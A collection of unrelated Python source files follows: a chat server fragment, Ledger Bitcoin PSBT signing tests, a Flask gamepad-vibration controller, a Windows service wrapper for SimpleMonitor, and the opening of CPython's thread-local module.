if client_dic['id'] in self.client_ids.keys():
logger.info("Removing client : {}, {}, {}, {}".format(client_dic['id'], client_dic['user_name'], client_dic['addr'], client_dic['project']))
del self.client_ids[client_dic['id']]
client_dic['conn'].close()
signal_dic = dict()
signal_dic['type'] = 'remove_user'
signal_dic['user_name'] = client_dic['user_name']
signal_dic['project'] = client_dic['project']
self.broadcast(signal_dic, client_dic)
if __name__ == "__main__":
try:
server = server()
server.daemon = True
server.start()
print('Press Ctrl+C to quit...')
while 1:time.sleep(1)
except KeyboardInterrupt:
print('Stopping server...')
raise SystemExit
sys.exit()
|
test_sign_psbt.py
|
import pytest
import threading
from decimal import Decimal
from typing import List
from pathlib import Path
from bitcoin_client.ledger_bitcoin import Client, PolicyMapWallet, MultisigWallet, AddressType
from bitcoin_client.ledger_bitcoin.exception.errors import IncorrectDataError, NotSupportedError
from bitcoin_client.ledger_bitcoin.psbt import PSBT
from bitcoin_client.ledger_bitcoin.wallet import AddressType
from speculos.client import SpeculosClient
from test_utils import automation, bip0340, txmaker
from embit.script import Script
from embit.networks import NETWORKS
tests_root: Path = Path(__file__).parent
CURRENCY_TICKER = "TEST"
def format_amount(ticker: str, amount: int) -> str:
"""Formats an amounts in sats as shown in the app: divided by 10_000_000, with no trailing zeroes."""
assert amount >= 0
return f"{ticker} {str(Decimal(amount) / 100_000_000)}"
def should_go_right(event: dict):
"""Returns true if the current text event implies a "right" button press to proceed."""
if event["text"].startswith("Review"):
return True
elif event["text"].startswith("Amount"):
return True
elif event["text"].startswith("Address"):
return True
elif event["text"].startswith("Confirm"):
return True
elif event["text"].startswith("Fees"):
return True
return False
def ux_thread_sign_psbt(speculos_client: SpeculosClient, all_events: List[dict]):
"""Completes the signing flow always going right and accepting at the appropriate time, while collecting all the events in all_events."""
# press right until the last screen (will press the "right" button more times than needed)
while True:
event = speculos_client.get_next_event()
all_events.append(event)
if should_go_right(event):
speculos_client.press_and_release("right")
elif event["text"] == "Approve":
speculos_client.press_and_release("both")
elif event["text"] == "Accept":
speculos_client.press_and_release("both")
break
def parse_signing_events(events: List[dict]) -> dict:
ret = dict()
# each of these is True if the _previous_ event was matching (so the next text needs to be recorded)
was_amount = False
was_address = False
was_fees = False
cur_output_index = -1
ret["addresses"] = []
ret["amounts"] = []
ret["fees"] = ""
for ev in events:
if ev["text"].startswith("output #"):
idx_str = ev["text"][8:]
assert int(idx_str) - 1 == cur_output_index + 1 # should not skip outputs
cur_output_index = int(idx_str) - 1
ret["addresses"].append("")
ret["amounts"].append("")
if was_address:
ret["addresses"][-1] += ev["text"]
if was_amount:
ret["amounts"][-1] += ev["text"]
if was_fees:
ret["fees"] += ev["text"]
was_amount = ev["text"].startswith("Amount")
was_address = ev["text"].startswith("Address")
was_fees = ev["text"].startswith("Fees")
return ret
def open_psbt_from_file(filename: str) -> PSBT:
raw_psbt_base64 = open(filename, "r").read()
psbt = PSBT()
psbt.deserialize(raw_psbt_base64)
return psbt
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_singlesig_pkh_1to1(client: Client):
# PSBT for a legacy 1-input 1-output spend (no change address)
psbt = open_psbt_from_file(f"{tests_root}/psbt/singlesig/pkh-1to1.psbt")
wallet = PolicyMapWallet(
"",
"pkh(@0)",
[
"[f5acc2fd/44'/1'/0']tpubDCwYjpDhUdPGP5rS3wgNg13mTrrjBuG8V9VpWbyptX6TRPbNoZVXsoVUSkCjmQ8jJycjuDKBb9eataSymXakTTaGifxR6kmVsfFehH1ZgJT/**"
],
)
# expected sigs:
# #0:
# "pubkey" : "02ee8608207e21028426f69e76447d7e3d5e077049f5e683c3136c2314762a4718",
# "signature" : "3045022100e55b3ca788721aae8def2eadff710e524ffe8c9dec1764fdaa89584f9726e196022012a30fbcf9e1a24df31a1010356b794ab8de438b4250684757ed5772402540f401"
result = client.sign_psbt(psbt, wallet, None)
assert result == {
0: bytes.fromhex(
"3045022100e55b3ca788721aae8def2eadff710e524ffe8c9dec1764fdaa89584f9726e196022012a30fbcf9e1a24df31a1010356b794ab8de438b4250684757ed5772402540f401"
)
}
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_singlesig_sh_wpkh_1to2(client: Client):
# PSBT for a wrapped segwit 1-input 2-output spend (1 change address)
psbt = open_psbt_from_file(f"{tests_root}/psbt/singlesig/sh-wpkh-1to2.psbt")
wallet = PolicyMapWallet(
"",
"sh(wpkh(@0))",
[
"[f5acc2fd/49'/1'/0']tpubDC871vGLAiKPcwAw22EjhKVLk5L98UGXBEcGR8gpcigLQVDDfgcYW24QBEyTHTSFEjgJgbaHU8CdRi9vmG4cPm1kPLmZhJEP17FMBdNheh3/**"
],
)
# expected sigs:
# #0:
# "pubkey" : "024ba3b77d933de9fa3f9583348c40f3caaf2effad5b6e244ece8abbfcc7244f67",
# "signature" : "30440220720722b08489c2a50d10edea8e21880086c8e8f22889a16815e306daeea4665b02203fcf453fa490b76cf4f929714065fc90a519b7b97ab18914f9451b5a4b45241201"
result = client.sign_psbt(psbt, wallet, None)
assert result == {
0: bytes.fromhex(
"30440220720722b08489c2a50d10edea8e21880086c8e8f22889a16815e306daeea4665b02203fcf453fa490b76cf4f929714065fc90a519b7b97ab18914f9451b5a4b45241201"
)
}
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_singlesig_wpkh_1to2(client: Client):
# PSBT for a legacy 1-input 2-output spend (1 change address)
psbt = open_psbt_from_file(f"{tests_root}/psbt/singlesig/wpkh-1to2.psbt")
wallet = PolicyMapWallet(
"",
"wpkh(@0)",
[
"[f5acc2fd/84'/1'/0']tpubDCtKfsNyRhULjZ9XMS4VKKtVcPdVDi8MKUbcSD9MJDyjRu1A2ND5MiipozyyspBT9bg8upEp7a8EAgFxNxXn1d7QkdbL52Ty5jiSLcxPt1P/**"
],
)
result = client.sign_psbt(psbt, wallet, None)
# expected sigs
# #0:
# "pubkey" : "03ee2c3d98eb1f93c0a1aa8e5a4009b70eb7b44ead15f1666f136b012ad58d3068",
# "signature" : "3045022100ab44f34dd7e87c9054591297a101e8500a0641d1d591878d0d23cf8096fa79e802205d12d1062d925e27b57bdcf994ecf332ad0a8e67b8fe407bab2101255da632aa01"
assert result == {
0: bytes.fromhex(
"3045022100ab44f34dd7e87c9054591297a101e8500a0641d1d591878d0d23cf8096fa79e802205d12d1062d925e27b57bdcf994ecf332ad0a8e67b8fe407bab2101255da632aa01"
)
}
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_singlesig_wpkh_2to2(client: Client):
# PSBT for a legacy 2-input 2-output spend (1 change address)
psbt = open_psbt_from_file(f"{tests_root}/psbt/singlesig/wpkh-2to2.psbt")
wallet = PolicyMapWallet(
"",
"wpkh(@0)",
[
"[f5acc2fd/84'/1'/0']tpubDCtKfsNyRhULjZ9XMS4VKKtVcPdVDi8MKUbcSD9MJDyjRu1A2ND5MiipozyyspBT9bg8upEp7a8EAgFxNxXn1d7QkdbL52Ty5jiSLcxPt1P/**"
],
)
result = client.sign_psbt(psbt, wallet, None)
# expected sigs
# #0:
# "pubkey" : "03455ee7cedc97b0ba435b80066fc92c963a34c600317981d135330c4ee43ac7a3",
# "signature" : "304402206b3e877655f08c6e7b1b74d6d893a82cdf799f68a5ae7cecae63a71b0339e5ce022019b94aa3fb6635956e109f3d89c996b1bfbbaf3c619134b5a302badfaf52180e01"
# #1:
# "pubkey" : "0271b5b779ad870838587797bcf6f0c7aec5abe76a709d724f48d2e26cf874f0a0",
# "signature" : "3045022100e2e98e4f8c70274f10145c89a5d86e216d0376bdf9f42f829e4315ea67d79d210220743589fd4f55e540540a976a5af58acd610fa5e188a5096dfe7d36baf3afb94001"
assert result == {
0: bytes.fromhex(
"304402206b3e877655f08c6e7b1b74d6d893a82cdf799f68a5ae7cecae63a71b0339e5ce022019b94aa3fb6635956e109f3d89c996b1bfbbaf3c619134b5a302badfaf52180e01"
),
1: bytes.fromhex(
"3045022100e2e98e4f8c70274f10145c89a5d86e216d0376bdf9f42f829e4315ea67d79d210220743589fd4f55e540540a976a5af58acd610fa5e188a5096dfe7d36baf3afb94001"
),
}
# def test_sign_psbt_legacy(client: Client):
# # legacy address
# # PSBT for a legacy 1-input 1-output spend
# unsigned_raw_psbt_base64 = "cHNidP8BAFQCAAAAAbUlIwxFfIt0fsuFCNtL3dHKcOvUPQu2CNcqc8FrNtTyAAAAAAD+////AaDwGQAAAAAAGKkU2FZEFTTPb1ZpCw2Oa2sc/FxM59GIrAAAAAAAAQD5AgAAAAABATfphYFskBaL7jbWIkU3K7RS5zKr5BvfNHjec1rNieTrAQAAABcWABTkjiMSrvGNi5KFtSy72CSJolzNDv7///8C/y8bAAAAAAAZdqkU2FZEFTTPb1ZpCw2Oa2sc/FxM59GIrDS2GJ0BAAAAF6kUnEFiBqwsbP0pWpazURx45PGdXkWHAkcwRAIgCxWs2+R6UcpQuD6QKydU0irJ7yNe++5eoOly5VgqrEsCIHUD6t4LNW0292vnP+heXZ6Walx8DRW2TB+IOazzDNcaASEDnQS6zdUebuNm7FuOdKonnlNmPPpUyN66w2CIsX5N+pUhIh4AAAA="
# psbt = PSBT()
# psbt.deserialize(unsigned_raw_psbt_base64)
# result = client.sign_psbt(psbt)
# print(result)
# def test_sign_psbt_legacy_p2pkh(client: Client):
# # test from app-bitcoin
# # legacy address
# # PSBT for a legacy 1-input, 1-output + 1-change address spend
# unsigned_raw_psbt_base64 = 'cHNidP8BAHcBAAAAAVf4kTUeYOlEcY8d8StPd7ZCzGMUYYS+3Gx7xkoMCzneAAAAAAAAAAAAAqCGAQAAAAAAGXapFHrmeHmDxejS4X7xcPdZBWw2A6fYiKygfAEAAAAAABl2qRQYm4Or/V0O+Y+/NZTJXMU7RJdK6oisAAAAAAABAOICAAAAAV33ueIMUtHaJwGiRKSXVCFSZvAW9r139kClIAzR+340AQAAAGtIMEUCIQDIBpV0KZNcXWH1SCI8NTbcc5/jUYFLzp7cFpTlpcJavwIgE+MHsLSIWstkzP+vX0eU8gUEAyXrw2wlh4fEiLA4wrsBIQOLpGLX3WWRfs5FQUKQO7NioLQS0YQdUgh62IFka2zcz/3///8CFAwDAAAAAAAZdqkUs+F8Te+KORSO1vrX3G/r4w3TJMuIrDBXBQAAAAAAGXapFOCok4BjXxi37glUbZYyMry5kkEriKz+BB0AAQMEAQAAAAAAAA=='
# # expected sig: 3044022012f6a643d1d1a558912e0935dbd6a9694fe87c841e0f699c7cbb7c818503c115022064585f9b69c3452183a74ee7f00ae0452139e2c73b156dfd6ac835bea4fdf975
# psbt = PSBT()
# psbt.deserialize(unsigned_raw_psbt_base64)
# result = client.sign_psbt(psbt)
# print(result)
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_multisig_wsh(client: Client):
wallet = MultisigWallet(
name="Cold storage",
address_type=AddressType.WIT,
threshold=2,
keys_info=[
f"[76223a6e/48'/1'/0'/2']tpubDE7NQymr4AFtewpAsWtnreyq9ghkzQBXpCZjWLFVRAvnbf7vya2eMTvT2fPapNqL8SuVvLQdbUbMfWLVDCZKnsEBqp6UK93QEzL8Ck23AwF/**",
f"[f5acc2fd/48'/1'/0'/2']tpubDFAqEGNyad35aBCKUAXbQGDjdVhNueno5ZZVEn3sQbW5ci457gLR7HyTmHBg93oourBssgUxuWz1jX5uhc1qaqFo9VsybY1J5FuedLfm4dK/**",
],
)
wallet_hmac = bytes.fromhex(
"d6434852fb3caa7edbd1165084968f1691444b3cfc10cf1e431acbbc7f48451f"
)
psbt = open_psbt_from_file(f"{tests_root}/psbt/multisig/wsh-2of2.psbt")
result = client.sign_psbt(psbt, wallet, wallet_hmac)
assert result == {
0: bytes.fromhex(
"304402206ab297c83ab66e573723892061d827c5ac0150e2044fed7ed34742fedbcfb26e0220319cdf4eaddff63fc308cdf53e225ea034024ef96de03fd0939b6deeea1e8bd301"
)
}
# def test_sign_psbt_legacy_wrong_non_witness_utxo(client: Client):
# # legacy address
# # PSBT for a legacy 1-input 1-output spend
# # The spend is valid, but the non-witness utxo is wrong; therefore, it should fail the hash test
# # TODO: this fails PSBT decoding; need to make a version we can control for this test.
# unsigned_raw_psbt_base64 = "cHNidP8BAFQCAAAAAbUlIwxFfIt0fsuFCNtL3dHKcOvUPQu2CNcqc8FrNtTyAAAAAAD+////AaDwGQAAAAAAGKkU2FZEFTTPb1ZpCw2Oa2sc/FxM59GIrAAAAAAAAQD5AgAAAAABATfphYFskBaL7jbWIkU3K7RS5zKr5BvfNHjec1rNieTrAQAAABcWABTkjiMSrvGNi5KFtSy72CSJolzNDv7///8C/y8bAAAAAAAZdqkU2FZEFTTPb1ZpCw2Oa2sc/FxM59GIrDS2GJ0BAAAAF6kUnEFiBqwsbP0pWpazURx45PGdXkWHAkcwRAIgCxWs2+R6UcpQuD6QKydU0irJ7yNe++5eoOly5VgqrEsCIHUD6t4LNW0292vnP+heXZ6Walx8DRW2TB+IOazzDNcaASEDnQS6zdUebuNm7FuOdKonnlNmPPpUyN66w2CIsX5N+pUySC0BAAA="
# psbt = PSBT()
# psbt.deserialize(unsigned_raw_psbt_base64)
# with pytest.raises(IncorrectDataError):
# client.sign_psbt(psbt)
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_taproot_1to2(client: Client):
# PSBT for a p2tr 1-input 2-output spend (1 change address)
psbt = open_psbt_from_file(f"{tests_root}/psbt/singlesig/tr-1to2.psbt")
wallet = PolicyMapWallet(
"",
"tr(@0)",
[
"[f5acc2fd/86'/1'/0']tpubDDKYE6BREvDsSWMazgHoyQWiJwYaDDYPbCFjYxN3HFXJP5fokeiK4hwK5tTLBNEDBwrDXn8cQ4v9b2xdW62Xr5yxoQdMu1v6c7UDXYVH27U/**"
],
)
result = client.sign_psbt(psbt, wallet, None)
# Unlike other transactions, Schnorr signatures are not deterministic (unless the randomness is removed)
# Therefore, for this testcase we hard-code the sighash (which was validated with Bitcoin Core 22.0 when the
# transaction was sent), and we verify the produced Schnorr signature with the reference bip340 implementation.
# sighash verified with bitcoin-core
sighash0 = bytes.fromhex("7A999E5AD6F53EA6448E7026061D3B4523F957999C430A5A492DFACE74AE31B6")
# get the (tweaked) pubkey from the scriptPubKey
pubkey0 = psbt.inputs[0].witness_utxo.scriptPubKey[2:]
assert len(result) == 1
# the sighash 0x01 is appended to the signature
assert len(result[0]) == 64+1
assert result[0][-1] == 0x01
sig0 = result[0][:-1]
assert bip0340.schnorr_verify(sighash0, pubkey0, sig0)
def test_sign_psbt_singlesig_wpkh_4to3(client: Client, comm: SpeculosClient, is_speculos: bool):
# PSBT for a segwit 4-input 3-output spend (1 change address)
# this test also checks that addresses, amounts and fees shown on screen are correct
if not is_speculos:
pytest.skip("Requires speculos")
wallet = PolicyMapWallet(
"",
"wpkh(@0)",
[
"[f5acc2fd/84'/1'/0']tpubDCtKfsNyRhULjZ9XMS4VKKtVcPdVDi8MKUbcSD9MJDyjRu1A2ND5MiipozyyspBT9bg8upEp7a8EAgFxNxXn1d7QkdbL52Ty5jiSLcxPt1P/**"
],
)
n_ins = 4
n_outs = 3
in_amounts = [10000 + 10000 * i for i in range(n_ins)]
out_amounts = [9999 + 9999 * i for i in range(n_outs)]
change_index = 1
psbt = txmaker.createPsbt(
wallet,
in_amounts,
out_amounts,
[i == change_index for i in range(n_outs)]
)
sum_in = sum(in_amounts)
sum_out = sum(out_amounts)
assert sum_out < sum_in
fees_amount = sum_in - sum_out
all_events: List[dict] = []
x = threading.Thread(target=ux_thread_sign_psbt, args=[comm, all_events])
x.start()
result = client.sign_psbt(psbt, wallet, None)
x.join()
assert len(result) == n_ins
parsed_events = parse_signing_events(all_events)
assert(parsed_events["fees"] == format_amount(CURRENCY_TICKER, fees_amount))
shown_out_idx = 0
for out_idx in range(n_outs):
if out_idx != change_index:
out_amt = psbt.tx.vout[out_idx].nValue
assert parsed_events["amounts"][shown_out_idx] == format_amount(CURRENCY_TICKER, out_amt)
out_addr = Script(psbt.tx.vout[out_idx].scriptPubKey).address(network=NETWORKS["test"])
assert parsed_events["addresses"][shown_out_idx] == out_addr
shown_out_idx += 1
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_singlesig_wpkh_64to256(client: Client, enable_slow_tests: bool):
# PSBT for a transaction with 64 inputs and 256 outputs (maximum currently supported in the app)
# Very slow test (esp. with DEBUG enabled), so disabled unless the --enableslowtests option is used
if not enable_slow_tests:
pytest.skip()
wallet = PolicyMapWallet(
"",
"wpkh(@0)",
[
"[f5acc2fd/84'/1'/0']tpubDCtKfsNyRhULjZ9XMS4VKKtVcPdVDi8MKUbcSD9MJDyjRu1A2ND5MiipozyyspBT9bg8upEp7a8EAgFxNxXn1d7QkdbL52Ty5jiSLcxPt1P/**"
],
)
psbt = txmaker.createPsbt(
wallet,
[10000 + 10000 * i for i in range(64)],
[999 + 99 * i for i in range(255)],
[i == 42 for i in range(255)]
)
result = client.sign_psbt(psbt, wallet, None)
assert len(result) == 64
def test_sign_psbt_fail_11_changes(client: Client):
# PSBT for transaction with 11 change addresses; the limit is 10, so it must fail with NotSupportedError
# before any user interaction
wallet = PolicyMapWallet(
"",
"wpkh(@0)",
[
"[f5acc2fd/84'/1'/0']tpubDCtKfsNyRhULjZ9XMS4VKKtVcPdVDi8MKUbcSD9MJDyjRu1A2ND5MiipozyyspBT9bg8upEp7a8EAgFxNxXn1d7QkdbL52Ty5jiSLcxPt1P/**"
],
)
psbt = txmaker.createPsbt(
wallet,
[11 * 100_000_000 + 1234],
[100_000_000] * 11,
[True] * 11,
)
with pytest.raises(NotSupportedError):
client.sign_psbt(psbt, wallet, None)
def test_sign_psbt_fail_wrong_non_witness_utxo(client: Client, is_speculos: bool):
# PSBT for transaction with the wrong non-witness utxo for an input.
# It must fail with IncorrectDataError before any user interaction.
if not is_speculos:
pytest.skip("Requires speculos")
wallet = PolicyMapWallet(
"",
"wpkh(@0)",
[
"[f5acc2fd/84'/1'/0']tpubDCtKfsNyRhULjZ9XMS4VKKtVcPdVDi8MKUbcSD9MJDyjRu1A2ND5MiipozyyspBT9bg8upEp7a8EAgFxNxXn1d7QkdbL52Ty5jiSLcxPt1P/**"
],
)
psbt = txmaker.createPsbt(
wallet,
[3 * 100_000_000],
[1 * 100_000_000, 2 * 100_000_000],
[False, True]
)
# Modify the non_witness_utxp so that the txid does not matches
wit = psbt.inputs[0].non_witness_utxo
wit.nLockTime = wit.nLockTime ^ 1 # change one byt of nLockTime arbitrarily to change the txid
wit.rehash()
psbt.inputs[0].non_witness_utxo = wit
client._no_clone_psbt = True
with pytest.raises(IncorrectDataError):
client.sign_psbt(psbt, wallet, None)
client._no_clone_psbt = False
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from flask import Flask, render_template_string, request, jsonify
app = Flask(__name__)
import logging
logging.basicConfig(level=logging.DEBUG)
import sys
sys.path.append('..')
from rumble import set_vibration
@app.route("/")
def index():
return render_template_string('''\
<html>
<head>
<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
<script type="text/javascript" src="{{ url_for('static', filename='js/jquery-3.1.1.min.js') }}"></script>
<!-- SOURCE: http://shpargalkablog.ru/2013/08/checked.html -->
<style>
#payt3 {display: none;}
[for="payt3"] {
position: relative;
display: block;
width: 100px;
height: 100px;
border-radius: 100%;
background: #ddd linear-gradient(#ccc, #fff);
box-shadow:
inset 0 2px 1px rgba(0,0,0,.15),
0 2px 5px rgba(200,200,200,.1);
cursor: pointer;
}
[for="payt3"]:after {
content: "";
position: absolute;
left: 40%; top: 40%;
width: 20%;
height: 20%;
border-radius: 100%;
background: #969696 radial-gradient(40% 35%, #ccc, #969696 60%);
box-shadow:
inset 0 2px 4px 1px rgba(0,0,0,.3),
0 1px 0 rgba(255,255,255,1),
inset 0 1px 0 white;
}
[for="payt3"]:before {
content: "";
position: absolute;
top: 8%; right: 8%; bottom: 8%; left: 8%;
border-radius: 100%;
background: #eaeaea;
box-shadow:
0 3px 5px rgba(0,0,0,.25),
inset 0 1px 0 rgba(255,255,255,.3),
inset 0 -5px 5px rgba(100,100,100,.1),
inset 0 5px 5px rgba(255,255,255,.3);
}
#payt3:checked ~ [for="payt3"]:before {
background: #e5e5e5 linear-gradient(#dedede, #fdfdfd);
}
#payt3:checked ~ [for="payt3"]:after {
background: #25d025 radial-gradient(40% 35%, #5aef5a, #25d025 60%);
box-shadow:
inset 0 3px 5px 1px rgba(0,0,0,.1),
0 1px 0 rgba(255,255,255,.4),
0 0 10px 2px rgba(0, 210, 0, .5);
}
</style>
</head>
<body>
<script>
function send_status() {
var left_motor = $('#left_motor').val();
var right_motor = $('#right_motor').val();
$('#left_motor_value').text(left_motor);
$('#right_motor_value').text(right_motor);
var data = {
enabled: $('#payt3').prop('checked'),
left_motor: left_motor,
right_motor: right_motor,
};
console.log("data = " + JSON.stringify(data));
$.ajax({
url: "/set_status",
method: "POST", // HTTP метод, по умолчанию GET
data: JSON.stringify(data),
contentType: "application/json",
dataType: "json", // тип данных загружаемых с сервера
success: function(data) {
console.log("success");
console.log(data);
},
error: function(data) {
console.log("error");
console.log(data);
}
});
}
$(document).ready(function() {
$.ajax({
url: "/get_status",
contentType: "application/json",
dataType: "json", // тип данных загружаемых с сервера
success: function(data) {
console.log("success");
console.log(data);
$('#payt3').prop('checked', data.enabled)
$('#left_motor').val(data.left_motor);
$('#right_motor').val(data.right_motor);
$('#left_motor_value').text(data.left_motor);
$('#right_motor_value').text(data.right_motor);
},
error: function(data) {
console.log("error");
console.log(data);
}
});
});
</script>
<table>
<tr>
<td colspan="2" style="text-align: center;">Rumble / Vibration</td>
</tr>
<tr>
<td colspan="2">
<input type="checkbox" id="payt3" oninput="send_status();"/>
<label align="center" for="payt3"></label>
</td>
</tr>
<tr><td>Left motor:</td><td>Right motor:</td></tr>
<tr>
<td><input id="left_motor" type="range" min="0" max="65535" step="1" value="0" onchange="send_status();"></td>
<td><input id="right_motor" type="range" min="0" max="65535" step="1" value="0" onchange="send_status();"></td>
</tr>
<tr>
<td id="left_motor_value" style="text-align: center;">0</td>
<td id="right_motor_value" style="text-align: center;">0</td>
</tr>
</table>
</body>
</html>''')
# Для отладки состояния ENABLED, LEFT_MOTOR и RIGHT_MOTOR
DEBUG = False
ENABLED = False
LEFT_MOTOR = 0
RIGHT_MOTOR = 0
@app.route("/set_status", methods=['POST'])
def set_status():
print('set_status')
data = request.get_json()
print(data)
global ENABLED, LEFT_MOTOR, RIGHT_MOTOR
if 'enabled' in data and 'left_motor' in data and 'right_motor' in data:
ENABLED = data['enabled']
LEFT_MOTOR = int(data['left_motor'])
RIGHT_MOTOR = int(data['right_motor'])
return jsonify(data)
@app.route("/get_status")
def get_status():
print('get_status')
data = {
'enabled': ENABLED,
'left_motor': LEFT_MOTOR,
'right_motor': RIGHT_MOTOR,
}
print(data)
return jsonify(data)
def vibration_tick():
while True:
if DEBUG:
print('ENABLED: {} ({}), LEFT_MOTOR: {}, RIGHT_MOTOR: {}'.format(
ENABLED, type(ENABLED), LEFT_MOTOR, RIGHT_MOTOR,
))
if ENABLED:
set_vibration(LEFT_MOTOR, RIGHT_MOTOR)
else:
set_vibration(0, 0)
import time
time.sleep(0.1)
if __name__ == "__main__":
import threading
t = threading.Thread(target=vibration_tick)
t.start()
# # Localhost
# # app.debug = True
# app.run(
# # OR: host='127.0.0.1'
# host='192.168.0.102',
# port=10000,
#
# # # Включение поддержки множества подключений
# # threaded=True,
# )
# # Public IP
app.run(host='0.0.0.0')
|
winmonitor.py
|
import win32serviceutil
import win32service
import win32event
import socket
import os
import logging
import sys
import multiprocessing as mp
r"""
Notes:
This service expects the 'monitor.ini' file to exist in the same directory.
If you receive an error "The service did not respond to the start
or control request in a timely fashion", it is likely/possible you need to
include the python and pywin32 binaries in your path:
e.g. (from an administrator prompt)
setx /M PATH "%PATH%;c:\Python;c:\Python\scripts;c:\Python\Lib\site-packages\pywin32_system32;c:\Python\Lib\site-packages\win32"
"""
# Change this to the location of your config file, if required
APP_PATH = os.path.realpath(os.path.dirname(__file__))
CONFIG = os.path.join(APP_PATH, 'monitor.ini')
LOGFILE = os.path.join(APP_PATH, 'simplemonitor.log')
# Setup Logging
def configure_logger(logger, level=logging.DEBUG):
logger.setLevel(level)
fh = logging.FileHandler(LOGFILE)
fh.setLevel(level)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
def setup_logger(level=logging.DEBUG):
return configure_logger(mp.get_logger(), level)
LOGGER = setup_logger(logging.INFO)
class AppServerSvc (win32serviceutil.ServiceFramework):
_svc_name_ = "SimpleMonitor"
_svc_display_name_ = "SimpleMonitor"
_svc_description_ = "A service wrapper for the python SimpleMonitor program"
def __init__(self, args):
# Initialise service
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
socket.setdefaulttimeout(60)
# Setup logger
self.logger = LOGGER
self.logger.info("Initialised {} service".format(self._svc_display_name_))
def SvcStop(self):
self.logger.info("Stopping {} service".format(self._svc_display_name_))
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
win32event.SetEvent(self.hWaitStop)
def SvcDoRun(self):
self.logger.info("Starting {} service".format(self._svc_display_name_))
import servicemanager
servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,
servicemanager.PYS_SERVICE_STARTED,
(self._svc_name, ''))
# Start monitor
p_mon = mp.Process(target=run_monitor)
p_mon.start()
self.logger.info("Started {} service".format(self._svc_display_name_))
# Wait for Monitor to finish
while True:
try:
# Watch monitor process for 2 seconds
p_mon.join(timeout=2)
if not p_mon.is_alive():
self.logger.warning("Service stopped prematurely.")
self.SvcStop()
# Check if we've received a stop command
rc = win32event.WaitForSingleObject(self.hWaitStop, 500)
if rc == win32event.WAIT_OBJECT_0:
p_mon.terminate()
p_mon.join()
break
self.logger.debug("Still running...")
except KeyboardInterrupt:
self.logger.warning("Interrupted {} service".format(self._svc_display_name_))
break
self.logger.info("Stopped {} service".format(self._svc_display_name_))
def run_monitor():
import monitor
sys.argv = ['monitor.py', "-vH", "--config={}".format(CONFIG)]
monitor.main()
if __name__ == '__main__':
win32serviceutil.HandleCommandLine(AppServerSvc)
|
_threading_local.py
|
"""Thread-local objects.
(Note that this module provides a Python version of the threading.local
class. Depending on the version of Python you're using, there may be a
faster one available. You should always import the `local` class from
`threading`.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = sorted(mydata.__dict__.items())
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... def __init__(self, **kw):
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red')], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
from weakref import ref
from contextlib import contextmanager
__all__ = ["local"]
# We need to use objects from the threading module, but the threading
# module may also want to use our `local` class, if support for locals
# isn't compiled in to the `thread` module. This creates potential problems
# with circular imports. For that reason, we don't import `threading`
# until the bottom of this file (a hack sufficient to worm around the
# potential problems). Note that all platforms on CPython do have support
# for locals in the `thread` module, and there is no circular import problem
# then, so problems introduced by fiddling the order of imports here won't
# manifest.
class _localimpl:
"""A class managing thread-local dicts"""
__slots__ = 'key', 'dicts', 'localargs', 'locallock', '__weakref__'
def __init__(self):
# The key used in the Thread objects' attribute dicts.
# We keep it a string for speed but make it unlikely to clash with
# a "real" attribute.
self.key = '_threading_local._localimpl.' + str(id(self))
# { id(Thread) -> (ref(Thread), thread-local dict) }
self.dicts = {}
def get_dict(self):
"""Return the dict for the current thread. Raises KeyError if none
defined."""
thread = current_thread()
return self.dicts[id(thread)][1]
def create_dict(self):
"""Create a new dict for the current thread, and return it."""
localdict = {}
key = self.key
thread = current_thread()
idt = id(thread)
def local_deleted(_, key=key):
# When the localimpl is deleted, remove the thread attribute.
thread = wrthread()
if thread is not None:
del thread.__dict__[key]
def thread_deleted(_, idt=idt):
# When the thread is deleted, remove the local dict.
# Note that this is suboptimal if the thread object gets
# caught in a reference loop. We would like to be called
# as soon as the OS-level thread ends instead.
local = wrlocal()
if local is not None:
